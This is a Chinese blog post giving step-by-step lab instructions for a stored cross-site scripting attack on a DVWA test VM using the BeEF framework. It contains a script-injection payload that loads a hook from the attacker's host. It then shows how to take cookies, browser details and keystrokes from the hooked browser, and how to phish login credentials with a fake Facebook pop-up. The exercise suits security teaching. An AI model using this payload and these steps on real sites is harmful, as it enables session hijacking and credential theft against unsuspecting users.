tnblog
首页
视频
资源
登录

跨站脚本攻击beef操作步骤实验内容

6185人阅读 2022/11/30 16:18 总访问:37978 评论:0 收藏:2 手机
分类: 实验

OWASP IP :192.168.35.128

Kali IP  :192.168.35.129

第三方客户机IP为: 192.168.201.189

1、启动beef   root@kali:beef-xss

2、复制http://127.0.0.1:3000/ui/panel 在kali的浏览器粘贴访问

3、将复制的地址改为kali的地址:

http://192.168.35.129:3000/ui/panel

4、kali中,进入dvwa,选择xss stored。输入<script src="http://192.168.35.129:3000/hook.js"></script>提交

5、
提交就靶机的浏览器就被beef钩住了:

一、获取用户的浏览器版本信息 点击Current Browser然后再点击Details即可查看到浏览器版本信息


二、获取cookie信息  点击Current Browser然后再点击Commands,   Browser(58)----Hooked Domain(0)文件夹里面的------Get Cookie 点击右下角的Execute即可获得cookie信息:


三、获取键盘录入信息   点击Current Browser然后再点击Logs即可查看到用户键盘输入信息


四、诱导其重复登录facebook获取帐号密码。

 点击Current Browser---- Commands点击SocialEngineering(24)里面的Pretty Theft 点击右下角的Execute

DVWA页面就会跳出一个Facebook弹窗输入EmailadminPassword:0836


再回到beef里面可以看到刚才输入的账户和密码data: answer=admin:0836





评价
等风来,乘风归。
排名
6
文章
6
粉丝
16
评论
8
{{item.articleTitle}}
{{item.blogName}} : {{item.content}}
ICP备案 :渝ICP备18016597号-1
网站信息:2018-2024TNBLOG.NET
技术交流:群号656732739
联系我们:contact@tnblog.net
公网安备:50010702506256
欢迎加群交流技术